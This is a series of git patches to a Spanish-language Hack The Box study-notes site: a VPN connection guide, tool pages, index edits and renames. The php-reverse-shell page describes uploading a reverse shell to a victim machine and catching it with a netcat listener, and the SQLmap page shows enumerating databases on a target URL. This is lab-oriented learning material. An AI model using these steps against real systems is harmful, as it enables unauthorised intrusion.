+
+Una vez descargado nuestro archivo `.ovpn`, abrimos una terminal, nos dirigimos al directorio donde se nos haya descargado el archivo, y yo aconsejo
+crearse un directorio específico para los distintos archivos `.ovpn` que HTB nos va proporcionando para los distintos servicios.
+
+Ahora solo faltaría ejecutar el siguiente comando:
+
+ sudo openvpn starting_Ponint_Firox.ovpn
+
+sudo : Nos permite actuar como root, y por tanto, tenemos todos los privilegios.
+
+openvpn : Ejecuta la orden de abrir la VPN
+
+starting_point_firox.ovpn : Es el archivo que nos hemos descargado.
+
+
+
+
+
+En la parte final, nos reporta que la conexión se ha realizado de forma correcta. No debemos cerrar esta terminal mientras estemos trabajando con
+la máquina, ya que si cerramos la terminal perdemos la conexión con la VPN y, por tanto, no podremos comunicarnos con la máquina.
+
+
+
+Veremos que el botón anterior se nos abra puesto en verde indicándonos a que servicio de VPN estamos conectados:
+
+
+
+Finalmente, par iniciar una máquina, simplemente pulsamos la `máquina` o `startging_point` que queramos realizar, comprobamos que la VPN está bien
+conectada (Primer tick verde) y luego pulsamos `Spawn Machine`.
+
+
+
+Una vez realizada la conexión, nos reportará la `Ip` de la máquina que vamos a explotar.
+
+
From 86952835d5df854bdd11760679aa74c2ca77c506 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 20:06:56 +0200
Subject: [PATCH 0106/1701] Update index.md
---
index.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/index.md b/index.md
index 4cb4588203c..53ced45e116 100644
--- a/index.md
+++ b/index.md
@@ -42,6 +42,8 @@
[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB.html)
+[¿Como conectarse a Htb?](./Como conectarse a HTB.html)
+
From 8f88562e542d11af865b471395afd3ac176ef1be Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 20:13:32 +0200
Subject: [PATCH 0107/1701] Update WichSystem.md
---
WichSystem.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/WichSystem.md b/WichSystem.md
index 5ca4aa37b0b..ba579bb5862 100644
--- a/WichSystem.md
+++ b/WichSystem.md
@@ -54,4 +54,4 @@ Esta herramienta no la he creado yo, solo la recopilo y comparto su instalación
El creador de está herramienta es el creador de contenido S4vitar, tiene diversos canales en Youtube y retrasmite en
Twitch sobre temas de ciber seguridad y resolución de maquinas de Hack the Box.
-S4vitar: https://github.com/s4vitar
+S4vitar: [https://github.com/s4vitar](https://github.com/s4vitar)
From 7c3c3e052d2248b82dcdbdca8a93b4b2a6aeee9c Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 20:14:17 +0200
Subject: [PATCH 0108/1701] Update WichSystem.md
---
WichSystem.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/WichSystem.md b/WichSystem.md
index ba579bb5862..09ae124e208 100644
--- a/WichSystem.md
+++ b/WichSystem.md
@@ -40,7 +40,7 @@ Creamos el archivo wichSystem.py:
Copiamos y pegamos el scrip (lo puedes encontrar en este mismo repositorio
como wichSystem.py).
-https://github.com/F1r0x/WichSystem/blob/main/wichSystem.py
+[https://github.com/F1r0x/WichSystem/blob/main/wichSystem.py](https://github.com/F1r0x/WichSystem/blob/main/wichSystem.py)
Guardamos : Cntrl + o
From 9440192edd6629f87b78431d220a374233d076c0 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 20:19:29 +0200
Subject: [PATCH 0109/1701] Update WichSystem.md
---
WichSystem.md | 24 ++++++++++--------------
1 file changed, 10 insertions(+), 14 deletions(-)
diff --git a/WichSystem.md b/WichSystem.md
index 09ae124e208..7117a31ed44 100644
--- a/WichSystem.md
+++ b/WichSystem.md
@@ -2,27 +2,24 @@

-Esta herramienta es un pequeño script en python creado por S4vitar que sirve
-para saber si estamos frente un sistema operativo Windows o Linux.
+Esta herramienta es un pequeño script en python creado por S4vitar que sirve para saber si estamos frente un sistema operativo Windows o Linux.
- El script básicamente diferencia entre el ttl de Linux y el de Windows de
- forma automáticamente.
+ El script básicamente diferencia entre el ttl de Linux y el de Windows de forma automáticamente.
Recordemos que Windows tiene un ttl=128 mientras que Linux tiene un ttl=65.
# Ejecución:
- wichSystem.py [Ip Víctima]
+ wichSystem.py [Ip Víctima]


-# Instalación:
+## Instalación:
-Para instalar esta herramienta simplemente nos descargamos o copiamos el
-archivo wichSystem.py y lo cramos en el directorio /usr/bin/
+Para instalar esta herramienta simplemente nos descargamos o copiamos el archivo `wichSystem.py` y lo creamos en el directorio `/usr/bin/`.
En caso de descargarlo, simplemente lo depositamos en ese directorio.
En caso de crearlo:
@@ -31,14 +28,13 @@ En caso de crearlo:
Vamos al directorio:
- cd /usr/bin/
+ cd /usr/bin/
Creamos el archivo wichSystem.py:
- sudo nano wichSystem.py
+ sudo nano wichSystem.py
-Copiamos y pegamos el scrip (lo puedes encontrar en este mismo repositorio
-como wichSystem.py).
+Copiamos y pegamos el script (lo puedes encontrar en este mismo repositorio como wichSystem.py).
[https://github.com/F1r0x/WichSystem/blob/main/wichSystem.py](https://github.com/F1r0x/WichSystem/blob/main/wichSystem.py)
@@ -51,7 +47,7 @@ Ya tendriamos listo nuestra nueva herramienta WichSystem.
# Menciones:
Esta herramienta no la he creado yo, solo la recopilo y comparto su instalación.
-El creador de está herramienta es el creador de contenido S4vitar, tiene diversos canales en Youtube y retrasmite en
-Twitch sobre temas de ciber seguridad y resolución de maquinas de Hack the Box.
+El creador de esta herramienta es el creador de contenido S4vitar, tiene diversos canales en YouTube y retransmite en Twitch sobre temas de ciber
+seguridad y resolución de máquinas de Hack the Box.
S4vitar: [https://github.com/s4vitar](https://github.com/s4vitar)
From f67691fcee4244641699209035403102eaf282d8 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 20:21:28 +0200
Subject: [PATCH 0110/1701] Update ExtractPorts.md
---
ExtractPorts.md | 21 ++++++++-------------
1 file changed, 8 insertions(+), 13 deletions(-)
diff --git a/ExtractPorts.md b/ExtractPorts.md
index 47e923413d2..a32c81a86bc 100644
--- a/ExtractPorts.md
+++ b/ExtractPorts.md
@@ -3,12 +3,11 @@
ExtractPorts es una función creada por S4vitar.
Esta herramienta nos mostrará en formato bat y los puertos encontrados.
-Mediante Cntrl + Shift + v podremos pegar los puertos a la terminal
-automáticamente.
+Mediante Cntrl + Shift + v podremos pegar los puertos a la terminal automáticamente.

- extractPorts allPorts
+ extractPorts allPorts
allPorts : Archivo previamente definido.
@@ -16,16 +15,13 @@ automáticamente.
Cntrl + Shift + v : Para pegar los puertos a la terminal.
- # Instalación:
+ ## Instalación:
- Para la instalación de esta herramienta previamente se recomienda tener
- instalado 'bat' que es una mejora del comando 'cat'.
+ Para la instalación de esta herramienta previamente se recomienda tener instalado 'bat' que es una mejora del comando 'cat'.
- Para poder tener está función activa, simplemente nos dirigiremos
- a la carpeta .bashrc o .zshrc (la que utilicéis) y pegaremos la función.
+ Para poder tener está función activa, simplemente nos dirigiremos a la carpeta .bashrc o .zshrc (la que utilicéis) y pegaremos la función.
- Esta función la podéis encontrar tanto en el perfil de S4vitar como
- en este repositorio.
+ Esta función la podéis encontrar tanto en el perfil de S4vitar como en este repositorio.
S4vitar: [https://github.com/s4vitar](https://github.com/s4vitar)
@@ -33,8 +29,7 @@ automáticamente.

-# Menciones:
+## Menciones:
-Esta función está creada por el creador de contenido S4vitar, podéis
-encontrar una gran cantidad de información sobre ciberseguridad en
+Esta función está creada por el creador de contenido S4vitar, podéis encontrar una gran cantidad de información sobre ciberseguridad en
sus canales de Youtube y Twitch.
From 4243ccf1bf82c089c954154ca252f8b0319ec4ae Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 20:22:32 +0200
Subject: [PATCH 0111/1701] Update ExtractPorts.md
---
ExtractPorts.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/ExtractPorts.md b/ExtractPorts.md
index a32c81a86bc..5e9e1fe2b3d 100644
--- a/ExtractPorts.md
+++ b/ExtractPorts.md
@@ -3,7 +3,7 @@
ExtractPorts es una función creada por S4vitar.
Esta herramienta nos mostrará en formato bat y los puertos encontrados.
-Mediante Cntrl + Shift + v podremos pegar los puertos a la terminal automáticamente.
+Mediante `Cntrl + Shift + v` podremos pegar los puertos a la terminal automáticamente.

From e12d2c431a3e7153614f9e998e958dd4e77d8397 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 20:24:53 +0200
Subject: [PATCH 0112/1701] Update ExtractPorts.md
---
ExtractPorts.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/ExtractPorts.md b/ExtractPorts.md
index 5e9e1fe2b3d..78f53f5f111 100644
--- a/ExtractPorts.md
+++ b/ExtractPorts.md
@@ -13,7 +13,7 @@ Mediante `Cntrl + Shift + v` podremos pegar los puertos a la terminal automátic

- Cntrl + Shift + v : Para pegar los puertos a la terminal.
+ `Cntrl + Shift + v` : Para pegar los puertos a la terminal.
## Instalación:
From fb5bd7b9709ba8fa904f6c418bcc2cac7deadc79 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 20:28:19 +0200
Subject: [PATCH 0113/1701] Update SQLmap.md
---
SQLmap.md | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/SQLmap.md b/SQLmap.md
index 22100c16f66..6bd17409a14 100644
--- a/SQLmap.md
+++ b/SQLmap.md
@@ -10,7 +10,7 @@ inyectarles códigos maliciosos. Viene con un potente motor de detección al cua
### Características:
Soporte completo para MySQL, Oracle, PostgreSQL y Microsoft SQL. Además de estos cuatro sistemas de gestión de bases de datos, sqlMap también puede
-identificar Microsoft Access, DB2, Informix, Sybase y Interbase.
+identificar Microsoft Access, DB2, Informix, Sybase e Interbase.
Amplia base de datos de sistema de gestión de huellas dactilares basadas en inband error messages, analizar el banner, las funciones de salida de
comparación y características específicas tales como MySQL comment injection.
@@ -23,7 +23,7 @@ Soporte completo para 2 técnicas de SQL injection: blind SQL injection y inband
SQLMAP viene preinstalado con kali linux, que es la opción preferida de la mayoría de los probadores de penetración. Sin embargo, puede instalar sqlmap
en otros sistemas Linux basados en Debian usando el comando:
- sudo apt-get install sqlmap
+ sudo apt-get install sqlmap
# Ejecución de SQLMap:
@@ -31,7 +31,7 @@ en otros sistemas Linux basados en Debian usando el comando:
sqlmap -u [Url Víctima] --dbs
-Primero, debemos ingresar la URL web que queremos verificar junto con el parámetro -u. También podemos usar el parámetro –tor si deseamos probar el
-sitio web usando proxies. Ahora, por lo general, nos gustaría probar si es posible obtener acceso a una base de datos. Así que usamos la opción –dbs para hacerlo. –dbs enumera todas las bases de datos disponibles.
+Primero, debemos ingresar la URL web que queremos verificar junto con el parámetro `-u`. También podemos usar el parámetro `–tor` si deseamos probar el
+sitio web usando proxies. Ahora, por lo general, nos gustaría probar si es posible obtener acceso a una base de datos. Así que usamos la opción `–dbs` para hacerlo. `–dbs` enumera todas las bases de datos disponibles.
Ejemplo: `sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs`
From 29cb546165f121c4e488f8d6f185a2af4a1be369 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 20:33:25 +0200
Subject: [PATCH 0114/1701] Update php-reverse-shell.md
---
php-reverse-shell.md | 14 +++++++-------
1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/php-reverse-shell.md b/php-reverse-shell.md
index 7f504b6411b..81fb5c09a55 100644
--- a/php-reverse-shell.md
+++ b/php-reverse-shell.md
@@ -8,7 +8,7 @@ usuario actual (normalmente apache).
# Repositorio:
-Desde aquí podreís copiar el script:
+Desde aquí podréis copiar el script:
[php-reverse-shell.php](https://github.com/F1r0x/php-reverse-shell.php/blob/main/php-reverse-shell.php)
# Configuración:
@@ -17,17 +17,17 @@ La configuración es muy simple, lo único que tenemos que hacer es cambiar la I
por la de nuestro sistema y establecer el puerto por el que queremos ponernos
en escucha.
-Abrimos una terminar y modificamos el archivo php-reverse-shell.php
+Abrimos una terminar y modificamos el archivo `php-reverse-shell.php`.
- sudo nano php-reverse-shell.php
+ sudo nano php-reverse-shell.php

-Establecemos nuestra Ip (tun0) y el puerto de escucha (en este ejemplo usaremos el 8080). Para saber
-cuál es nuestra Ip, podemos verlo mediante el comando 'ipconfig':
+Establecemos nuestra Ip (tun0) y el puerto de escucha (en este ejemplo usaremos el 8080). Para saber cuál es nuestra Ip, podemos verlo mediante el
+comando 'ipconfig':
- sudo ifconfig
+ sudo ifconfig

@@ -39,7 +39,7 @@ Guardamos (Cntrl + o) y salimos (Cntrl + x).
Primero cargamos el archivo php-reverse-shell.php a una máquina víctima. Luego, mediante la herramienta NetCat
nos pondremos por escucha por el puerto previamente definido (en nuestro caso el 8080):
- nc -lnvp 8080
+ nc -lnvp 8080
Ejecutamos el archivo php-reverse-shell.php (recargamos el navegado en la dirección en la que se encuentre el
archivo). Si todo ha funcionado correctamente se nos tendría que abrir una shell en la terminal en la que estábamos
From 577a1f768c0b26f25450a8e633bee8ad9d22649f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 22:21:50 +0200
Subject: [PATCH 0115/1701] Create Wfuzz.md
---
Wfuzz.md | 14 ++++++++++++++
1 file changed, 14 insertions(+)
create mode 100644 Wfuzz.md
diff --git a/Wfuzz.md b/Wfuzz.md
new file mode 100644
index 00000000000..5b95dc38ca5
--- /dev/null
+++ b/Wfuzz.md
@@ -0,0 +1,14 @@
+
+
+# ¿Qué es Wfuzz?
+
+WFuzz es una herramienta y biblioteca de fuzzer de seguridad de aplicaciones web para Python.
+
+# Cómo funciona:
+
+Wfuzz se basa en un concepto simple: reemplaza cualquier referencia a la palabra clave FUZZ por el valor de una carga útil determinada.
+
+Una carga útil en Wfuzz es una fuente de datos.
+
+Este concepto simple permite inyectar cualquier entrada en cualquier campo de una solicitud HTTP, lo que permite realizar complejos ataques
+de seguridad web en diferentes componentes de la aplicación web, como: parámetros, autenticación, formularios, directorios/archivos, encabezados, etc.
From 26e7e5a62bca2b726b4b11d8a417da090bf15d13 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 22:29:16 +0200
Subject: [PATCH 0116/1701] Update index.md
---
index.md | 23 +++++++++++++++--------
1 file changed, 15 insertions(+), 8 deletions(-)
diff --git a/index.md b/index.md
index 53ced45e116..d029b3201f2 100644
--- a/index.md
+++ b/index.md
@@ -8,6 +8,13 @@
[HTB-Vaccine](./HTB-Vaccine.html)
+---
+# Artículos
+
+[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB.html)
+
+[¿Como conectarse a Htb?](./Como conectarse a HTB.html)
+
---
# Herramientas y Scripts
@@ -22,12 +29,20 @@
[php-reverse-shell.php](./php-reverse-shell.html)
### Hash:
+Herramientas de reconocimiento y des encriptación de hash.
1.[John the Ripper](./john_the_ripper.html)
2.[HashID](./HashId.html)
3.[Hash Identifier](./Hash-Identifier.html)
4.[HashCat](./HashCat.html)
+# Fuzzing:
+Fuzzing es una técnica de pruebas de software, a menudo automatizado o semiautomatizado, que implica proporcionar datos inválidos, inesperados o
+aleatorios a las entradas de un programa de ordenador. Entonces se monitorizan las excepciones tales como caídas, aserciones de código erróneas, o
+para encontrar potenciales filtraciones de memoria.
+
+[Wfuzz](./Wfuzz.html)
+
### WordPress:
[WPScan](./WPScan.html)
@@ -36,14 +51,6 @@
[SQLmap](./SQLmap.html)
----
-
-# Artículos
-
-[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB.html)
-
-[¿Como conectarse a Htb?](./Como conectarse a HTB.html)
-
From 8ad2a98570900ff772287a554c22c906ba960105 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 22:30:57 +0200
Subject: [PATCH 0117/1701] Update index.md
---
index.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/index.md b/index.md
index d029b3201f2..58dae37932c 100644
--- a/index.md
+++ b/index.md
@@ -36,7 +36,7 @@ Herramientas de reconocimiento y des encriptación de hash.
3.[Hash Identifier](./Hash-Identifier.html)
4.[HashCat](./HashCat.html)
-# Fuzzing:
+### Fuzzing:
Fuzzing es una técnica de pruebas de software, a menudo automatizado o semiautomatizado, que implica proporcionar datos inválidos, inesperados o
aleatorios a las entradas de un programa de ordenador. Entonces se monitorizan las excepciones tales como caídas, aserciones de código erróneas, o
para encontrar potenciales filtraciones de memoria.
From c96b8aa71e838f9a35932ea48e7a52e7a629b104 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 22:37:05 +0200
Subject: [PATCH 0118/1701] Update index.md
---
index.md | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/index.md b/index.md
index 58dae37932c..2e2420cc8f7 100644
--- a/index.md
+++ b/index.md
@@ -20,6 +20,7 @@
# Herramientas y Scripts
### Reporte y reconocimiento:
+Herramientas útiles para la fase de reconocimiento como reportes de SO o recopilación de puertos.
1.[WichSystem](./WichSystem.html)
2.[ExtractPorts](./ExtractPorts.html)
@@ -44,11 +45,9 @@ para encontrar potenciales filtraciones de memoria.
[Wfuzz](./Wfuzz.html)
### WordPress:
-
[WPScan](./WPScan.html)
### SQL:
-
[SQLmap](./SQLmap.html)
From f1d4e7a98b84118e494fe0c2acc104986e38eca2 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 22:40:48 +0200
Subject: [PATCH 0119/1701] Update index.md
---
index.md | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/index.md b/index.md
index 2e2420cc8f7..5440ae0c2e1 100644
--- a/index.md
+++ b/index.md
@@ -20,12 +20,13 @@
# Herramientas y Scripts
### Reporte y reconocimiento:
-Herramientas útiles para la fase de reconocimiento como reportes de SO o recopilación de puertos.
+Herramientas útiles para la fase de reconocimiento, como reportes de SO o recopilación de puertos.
1.[WichSystem](./WichSystem.html)
2.[ExtractPorts](./ExtractPorts.html)
### Shells:
+Herramientas para crear shells inversas.
[php-reverse-shell.php](./php-reverse-shell.html)
@@ -45,6 +46,8 @@ para encontrar potenciales filtraciones de memoria.
[Wfuzz](./Wfuzz.html)
### WordPress:
+Escaneo de vulnerabilidades en páginas WordPress.
+
[WPScan](./WPScan.html)
### SQL:
From e1e9b57157266025d9e5391cbf043cc7988f4429 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 28 Apr 2022 22:41:50 +0200
Subject: [PATCH 0120/1701] Update index.md
---
index.md | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/index.md b/index.md
index 5440ae0c2e1..0145f500c2d 100644
--- a/index.md
+++ b/index.md
@@ -19,18 +19,18 @@
# Herramientas y Scripts
-### Reporte y reconocimiento:
+## Reporte y reconocimiento:
Herramientas útiles para la fase de reconocimiento, como reportes de SO o recopilación de puertos.
1.[WichSystem](./WichSystem.html)
2.[ExtractPorts](./ExtractPorts.html)
-### Shells:
+## Shells:
Herramientas para crear shells inversas.
[php-reverse-shell.php](./php-reverse-shell.html)
-### Hash:
+## Hash:
Herramientas de reconocimiento y des encriptación de hash.
1.[John the Ripper](./john_the_ripper.html)
@@ -38,19 +38,19 @@ Herramientas de reconocimiento y des encriptación de hash.
3.[Hash Identifier](./Hash-Identifier.html)
4.[HashCat](./HashCat.html)
-### Fuzzing:
+## Fuzzing:
Fuzzing es una técnica de pruebas de software, a menudo automatizado o semiautomatizado, que implica proporcionar datos inválidos, inesperados o
aleatorios a las entradas de un programa de ordenador. Entonces se monitorizan las excepciones tales como caídas, aserciones de código erróneas, o
para encontrar potenciales filtraciones de memoria.
[Wfuzz](./Wfuzz.html)
-### WordPress:
+## WordPress:
Escaneo de vulnerabilidades en páginas WordPress.
[WPScan](./WPScan.html)
-### SQL:
+## SQL:
[SQLmap](./SQLmap.html)
From c28f8aebeb64e1086f8fe474f3e094684079d51b Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:06:02 +0200
Subject: [PATCH 0121/1701] Rename HTB-Oopsie.md to Starting
Point/HTB-Oopsie.md
---
HTB-Oopsie.md => Starting Point/HTB-Oopsie.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename HTB-Oopsie.md => Starting Point/HTB-Oopsie.md (100%)
diff --git a/HTB-Oopsie.md b/Starting Point/HTB-Oopsie.md
similarity index 100%
rename from HTB-Oopsie.md
rename to Starting Point/HTB-Oopsie.md
From d231752083c4292538e4b21f618735b87c4c9300 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:06:41 +0200
Subject: [PATCH 0122/1701] Rename HTB-Responder.md to Starting
Point/HTB-Responder.md
---
HTB-Responder.md => Starting Point/HTB-Responder.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename HTB-Responder.md => Starting Point/HTB-Responder.md (100%)
diff --git a/HTB-Responder.md b/Starting Point/HTB-Responder.md
similarity index 100%
rename from HTB-Responder.md
rename to Starting Point/HTB-Responder.md
From 373a0ccc6654b1090d8f66bd74cb8c01487f2637 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:07:40 +0200
Subject: [PATCH 0123/1701] Rename HTB-Vaccine.md to Starting
Point/HTB-Vaccine.md
---
HTB-Vaccine.md => Starting Point/HTB-Vaccine.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename HTB-Vaccine.md => Starting Point/HTB-Vaccine.md (100%)
diff --git a/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
similarity index 100%
rename from HTB-Vaccine.md
rename to Starting Point/HTB-Vaccine.md
From 45b21e1ee11d2980df26973818ecc82a9755dc6c Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:10:35 +0200
Subject: [PATCH 0124/1701] Update index.md
---
index.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/index.md b/index.md
index 0145f500c2d..97fb2516ff2 100644
--- a/index.md
+++ b/index.md
@@ -2,11 +2,11 @@
## Starting Points
-[HTB-Oopsie](./HTB-Oopsie.html)
+[HTB-Oopsie](./Starting Point/HTB-Oopsie.html)
-[HTB-Responder](./HTB-Responder.html)
+[HTB-Responder](./Starting Point/HTB-Responder.html)
-[HTB-Vaccine](./HTB-Vaccine.html)
+[HTB-Vaccine](./Starting Point/HTB-Vaccine.html)
---
# Artículos
From 120b9ac3fce2e62298254d363c7972253a78562f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:15:44 +0200
Subject: [PATCH 0125/1701] Update CODEOWNERS
---
.github/CODEOWNERS | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
index 96a0234ebff..2fb7cafbbbf 100644
--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -1,3 +1,3 @@
# Require maintainer's :+1: for changes to the .github/ repo-config files
# mainly due to https://github.com/probot/settings privilege escalation
-.github/* @pages-themes/maintainers
+#.github/* @pages-themes/maintainers
From 2110d2702bc95311ce64d68901cc11643d68fafb Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:16:52 +0200
Subject: [PATCH 0126/1701] Delete CODEOWNERS
---
.github/CODEOWNERS | 3 ---
1 file changed, 3 deletions(-)
delete mode 100644 .github/CODEOWNERS
diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
deleted file mode 100644
index 2fb7cafbbbf..00000000000
--- a/.github/CODEOWNERS
+++ /dev/null
@@ -1,3 +0,0 @@
-# Require maintainer's :+1: for changes to the .github/ repo-config files
-# mainly due to https://github.com/probot/settings privilege escalation
-#.github/* @pages-themes/maintainers
From d6e0ee4fabd0fbc250cd82d47ad47bb794f2ab54 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:38:05 +0200
Subject: [PATCH 0127/1701] =?UTF-8?q?Rename=20Como=20conectarse=20a=20HTB.?=
=?UTF-8?q?md=20to=20Art=C3=ADculos/Como=20conectarse=20a=20HTB.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Como conectarse a HTB.md" | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename Como conectarse a HTB.md => "Art\303\255culos/Como conectarse a HTB.md" (100%)
diff --git a/Como conectarse a HTB.md "b/Art\303\255culos/Como conectarse a HTB.md"
similarity index 100%
rename from Como conectarse a HTB.md
rename to "Art\303\255culos/Como conectarse a HTB.md"
From 2f4cdbc024ee5dd28bfce7fd42921d67fc71cb82 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:38:40 +0200
Subject: [PATCH 0128/1701] =?UTF-8?q?Rename=20Fase=5Fde=5Freconocimiento-H?=
=?UTF-8?q?TB.md=20to=20Art=C3=ADculos/Fase=5Fde=5Freconocimiento-HTB.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Fase_de_reconocimiento-HTB.md" | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename Fase_de_reconocimiento-HTB.md => "Art\303\255culos/Fase_de_reconocimiento-HTB.md" (100%)
diff --git a/Fase_de_reconocimiento-HTB.md "b/Art\303\255culos/Fase_de_reconocimiento-HTB.md"
similarity index 100%
rename from Fase_de_reconocimiento-HTB.md
rename to "Art\303\255culos/Fase_de_reconocimiento-HTB.md"
From 7199f092694e7f8a38330008087734a964ddede9 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:40:01 +0200
Subject: [PATCH 0129/1701] Update index.md
---
index.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/index.md b/index.md
index 97fb2516ff2..9f4b5c45eb3 100644
--- a/index.md
+++ b/index.md
@@ -11,9 +11,9 @@
---
# Artículos
-[Fase de Reconocimiento - HTB](./Fase_de_reconocimiento-HTB.html)
+[Fase de Reconocimiento - HTB](./Artículos/Fase_de_reconocimiento-HTB.html)
-[¿Como conectarse a Htb?](./Como conectarse a HTB.html)
+[¿Como conectarse a Htb?](./Artículos/Como conectarse a HTB.html)
---
From 75d4975e18ae57c2d603ee29f224c01386429cc5 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:43:38 +0200
Subject: [PATCH 0130/1701] Rename Como conectarse a HTB.md to
Como_conectarse_a_HTB.md
---
.../Como_conectarse_a_HTB.md" | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename "Art\303\255culos/Como conectarse a HTB.md" => "Art\303\255culos/Como_conectarse_a_HTB.md" (100%)
diff --git "a/Art\303\255culos/Como conectarse a HTB.md" "b/Art\303\255culos/Como_conectarse_a_HTB.md"
similarity index 100%
rename from "Art\303\255culos/Como conectarse a HTB.md"
rename to "Art\303\255culos/Como_conectarse_a_HTB.md"
From 1e14cb23c6661d677ee9b8bee152ca0e3d4c1397 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:44:20 +0200
Subject: [PATCH 0131/1701] Update index.md
---
index.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/index.md b/index.md
index 9f4b5c45eb3..c20877032f0 100644
--- a/index.md
+++ b/index.md
@@ -13,7 +13,7 @@
[Fase de Reconocimiento - HTB](./Artículos/Fase_de_reconocimiento-HTB.html)
-[¿Como conectarse a Htb?](./Artículos/Como conectarse a HTB.html)
+[¿Como conectarse a Htb?](./Artículos/Como_conectarse_a_HTB.html)
---
From 647a0b8a52bb6ba0eb7a3b6cba4420935a45dc0a Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:49:35 +0200
Subject: [PATCH 0132/1701] Rename ExtractPorts.md to
Herramientas_y_Scripts/ExtractPorts.md
---
ExtractPorts.md => Herramientas_y_Scripts/ExtractPorts.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename ExtractPorts.md => Herramientas_y_Scripts/ExtractPorts.md (100%)
diff --git a/ExtractPorts.md b/Herramientas_y_Scripts/ExtractPorts.md
similarity index 100%
rename from ExtractPorts.md
rename to Herramientas_y_Scripts/ExtractPorts.md
From c6f45c02606b983639b21ac8c4b375a4a096b3c0 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:49:55 +0200
